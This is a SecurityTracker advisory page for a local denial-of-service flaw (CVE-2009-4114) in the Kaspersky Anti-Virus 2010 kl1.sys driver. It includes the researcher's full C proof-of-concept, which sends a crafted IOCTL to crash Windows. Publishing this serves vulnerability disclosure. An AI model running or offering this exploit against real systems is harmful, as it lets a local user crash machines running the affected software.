SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Security)  >   Kaspersky Anti-Virus Vendors:   Kaspersky Lab
Kaspersky Anti-Virus 'kl1.sys' IOCTL Error Lets Local Users Deny Service
SecurityTracker Alert ID:  1023198
SecurityTracker URL:  http://securitytracker.com/id/1023198
CVE Reference:   CVE-2009-4114   (Links to External Site)
Updated:  Dec 2 2009
Original Entry Date:  Nov 19 2009
Impact:   Denial of service via local system
Exploit Included:  Yes  
Version(s): 2010 9.0.0.463
Description:   A vulnerability was reported in Kaspersky Anti-Virus. A local user can cause denial of service conditions.

A local user can issue a specially crafted IOCTL to 'kl1.sys' to cause the target system to crash.

Heurs reported this vulnerability.
Impact:   A local user can cause the target system to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.kaspersky.com/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Tue, 17 Nov 2009 17:08:19 +0100 (CET)
Subject:  Kaspersky Anti-Virus 2010 <= 9.0.0.463 pointer dereference vulnerability

/*
Program          : Kaspersky Anti-Virus 2010 9.0.0.463
Homepage         : http://www.kaspersky.com
Discovery        : 2009/09/29
Author Contacted : 2009/10/01
Patch Updated    : 2009/11/16
Found by         : Heurs
This Advisory    : Heurs
Contact          : s.leberre@sysdream.com


//----- Application description


The most trusted virus and spyware protection - premium protection 
against viruses, spyware, Trojans, worms, bots and more. Also includes 
comprehensive phishing and identity theft defense and superfast performance.

//----- Description of vulnerability

kl1.sys driver don't check inputs address of an IOCTL. An exception can be 
thrown if we modify one or two DWORDs.
With my test I can't do best exploitation than a BSOD.

//----- Credits

http://www.sysdream.com
http://ghostsinthestack.org

s.leberre at sysdream dot com
heurs at ghostsinthestack dot org

//----- Greetings

Trance

*/

#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>

int __cdecl main(int argc, char* argv[])
{
    HANDLE hDevice = (HANDLE) 0xffffffff;
    DWORD NombreByte;
    DWORD Crashing[] = {
         0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a,
         0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961,
         0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9,
         0xb5ebadc5
        };
    BYTE Out[0x20];
    
    printf("Local DoS - Kaspersky 2010 9.0.0.463\n\n");
    hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
    
    DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof(Out),&NombreByte,NULL);
    
    printf("Sploit Send.\nhDevice = %x\n", hDevice);
    CloseHandle(hDevice);
    getch();
    return 0;
}


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC